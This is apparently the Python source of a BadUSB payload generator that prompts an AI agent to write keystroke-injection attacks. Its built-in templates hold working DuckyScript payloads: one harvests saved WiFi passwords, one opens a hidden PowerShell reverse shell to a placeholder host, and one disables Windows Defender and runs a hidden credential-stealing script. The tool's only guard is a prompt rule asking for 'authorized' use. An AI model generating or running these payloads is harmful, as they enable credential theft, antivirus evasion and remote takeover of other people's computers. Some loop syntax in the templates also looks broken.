"""
ERR0RS BadUSB Studio - AI Payload Generator
Uses ERR0RS AI agent to generate custom DuckyScript or CircuitPython payloads
from natural language descriptions
"""


SYSTEM_PROMPT = """You are ERR0RS BadUSB Payload Generator, an expert in:
- DuckyScript 3.0 for USB Rubber Ducky
- CircuitPython HID scripts for RP2040 (Pi Pico, etc.)
- Windows, Linux, and macOS attack techniques via HID injection
- Red team physical access tactics

RULES:
1. Only generate payloads for authorized penetration testing and red team operations.
2. Always output ONLY the payload code, no explanations unless asked.
3. Default to DuckyScript unless user specifies CircuitPython.
4. Include appropriate DELAY commands for reliability.
5. Add REM comments explaining each section.
6. Use PASSIVE_WINDOWS_DETECT extension when targeting Windows.
7. Never hardcode credentials - use placeholders like YOUR_IP, YOUR_PORT.

DuckyScript 3.0 key commands:
ATTACKMODE HID STORAGE, EXTENSION PASSIVE_WINDOWS_DETECT,
DELAY ms, STRING text, STRINGLN text, ENTER, GUI r,
CTRL_SHIFT ENTER, ALT F4, REM comment, REM_BLOCK...END_REM,
DEFINE #NAME value, VAR $name = value, IF/WHILE/END_IF/END_WHILE
"""


class PayloadGenerator:
    """AI-powered payload generator using ERR0RS agent"""

    def __init__(self, ai_client=None):
        """
        ai_client: an object with a .complete(system, user) -> str method
        If None, falls back to template-based generation
        """
        self.ai_client = ai_client
        self.history = []

    # ------------------------------------------------------------------ #
    #  AI GENERATION                                                      #
    # ------------------------------------------------------------------ #

    def generate(self, description: str, target_os: str = "windows",
                 output_format: str = "duckyscript") -> str:
        """Generate a payload from a natural language description"""
        user_prompt = (
            f"Target OS: {target_os}\n"
            f"Output format: {output_format}\n"
            f"Objective: {description}\n\n"
            f"Generate the payload now:"
        )

        if self.ai_client:
            try:
                payload = self.ai_client.complete(SYSTEM_PROMPT, user_prompt)
                self.history.append({
                    "description": description,
                    "target_os": target_os,
                    "format": output_format,
                    "payload": payload
                })
                return payload
            except Exception as e:
                return self._template_fallback(description, target_os, output_format)
        else:
            return self._template_fallback(description, target_os, output_format)

    def refine(self, payload: str, feedback: str) -> str:
        """Refine an existing payload based on feedback"""
        user_prompt = (
            f"Existing payload:\n```\n{payload}\n```\n\n"
            f"Refinement request: {feedback}\n\n"
            f"Output the improved payload:"
        )
        if self.ai_client:
            try:
                return self.ai_client.complete(SYSTEM_PROMPT, user_prompt)
            except Exception as e:
                return f"REM Refinement failed: {e}\n{payload}"
        return payload

    # ------------------------------------------------------------------ #
    #  TEMPLATE FALLBACKS (offline / no AI)                              #
    # ------------------------------------------------------------------ #

    def _template_fallback(self, description: str, target_os: str, fmt: str) -> str:
        """Return best-match template when AI is unavailable"""
        desc_lower = description.lower()

        if "wifi" in desc_lower or "password" in desc_lower:
            return self._template_wifi_harvest()
        elif "reverse shell" in desc_lower or "shell" in desc_lower:
            return self._template_reverse_shell()
        elif "credential" in desc_lower or "browser" in desc_lower:
            return self._template_browser_creds()
        else:
            return self._template_generic(description)

    def _template_wifi_harvest(self) -> str:
        return """ATTACKMODE HID STORAGE
EXTENSION PASSIVE_WINDOWS_DETECT
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
$_OS = WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE( ($_RECIEVED_HOST_LOCK_LED_REPLAY == FALSE) && ($MAX_TRIES > 0) )
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_IF
END_EXTENSION

REM WiFi Password Harvester - Generated by ERR0RS BadUSB Studio
IF ($_OS == WINDOWS) THEN
    DELAY 200
    GUI r
    DELAY 300
    STRING powershell -WindowStyle Hidden
    CTRL_SHIFT ENTER
    DELAY 500
    LEFT
    DELAY 150
    ENTER
    DELAY 600
    STRINGLN $profiles = netsh wlan show profiles | Select-String 'All User Profile\s+:\s(.+)' | ForEach-Object { $_.Matches[0].Groups[1].Value.Trim() }
    STRINGLN $out = @(); foreach ($p in $profiles) { $d = netsh wlan show profile name=$p key=clear; $k = ($d | Select-String 'Key Content\s+:\s+(.+)').Matches.Groups[1].Value; $out += "$p : $k" }
    STRINGLN $out | Out-File "$env:TEMP\wifi.txt"
    STRINGLN exit
END_IF"""

    def _template_reverse_shell(self) -> str:
        return """ATTACKMODE HID STORAGE
EXTENSION PASSIVE_WINDOWS_DETECT
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
$_OS = WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE( ($_RECIEVED_HOST_LOCK_LED_REPLAY == FALSE) && ($MAX_TRIES > 0) )
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_IF
END_EXTENSION

REM Reverse Shell - Generated by ERR0RS BadUSB Studio
REM Configure YOUR_IP and YOUR_PORT before deploying
IF ($_OS == WINDOWS) THEN
    DELAY 200
    GUI r
    DELAY 300
    STRING powershell -WindowStyle Hidden
    CTRL_SHIFT ENTER
    DELAY 500
    LEFT
    DELAY 150
    ENTER
    DELAY 600
    STRINGLN $c=New-Object Net.Sockets.TCPClient('YOUR_IP',YOUR_PORT);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$rb=$r+'PS '+(pwd).Path+'> ';$sb=([text.encoding]::ASCII).GetBytes($rb);$s.Write($sb,0,$sb.Length);$s.Flush()};$c.Close()
    STRINGLN exit
END_IF"""

    def _template_browser_creds(self) -> str:
        return """ATTACKMODE HID STORAGE
EXTENSION PASSIVE_WINDOWS_DETECT
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #DUCKY_DRIVE_LABEL DUCKY
DEFINE #PS1 sy_cred.ps1
$_OS = WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE( ($_RECIEVED_HOST_LOCK_LED_REPLAY == FALSE) && ($MAX_TRIES > 0) )
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_IF
END_EXTENSION

REM Browser Credential Harvester - Generated by ERR0RS BadUSB Studio
IF ($_OS == WINDOWS) THEN
    DELAY 200
    GUI r
    DELAY 200
    STRING powershell
    CTRL_SHIFT ENTER
    DELAY 400
    LEFT
    DELAY 150
    ENTER
    DELAY 500
    STRINGLN_POWERSHELL
    $d=(Get-CimInstance Win32_LogicalDisk|Where-Object{$_.VolumeName -eq '#DUCKY_DRIVE_LABEL'}).DeviceID;cd $d
    Set-MpPreference -DisableRealtimeMonitoring $true
    Add-MpPreference -ExclusionPath "$d\"
    Start-Process powershell.exe -ArgumentList "-NoProfile -WindowStyle Hidden -file #PS1" -WindowStyle Hidden
    exit
    END_STRINGLN
END_IF"""

    def _template_generic(self, description: str) -> str:
        return f"""ATTACKMODE HID STORAGE
EXTENSION PASSIVE_WINDOWS_DETECT
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
$_OS = WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE( ($_RECIEVED_HOST_LOCK_LED_REPLAY == FALSE) && ($MAX_TRIES > 0) )
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_IF
END_EXTENSION

REM Generated by ERR0RS BadUSB Studio
REM Objective: {description}
REM TODO: Add your payload logic below

IF ($_OS == WINDOWS) THEN
    DELAY 500
    REM Add your DuckyScript commands here
END_IF"""

    def get_history(self) -> list:
        """Return generation history for this session"""
        return self.history

    def clear_history(self):
        """Clear generation history"""
        self.history = []
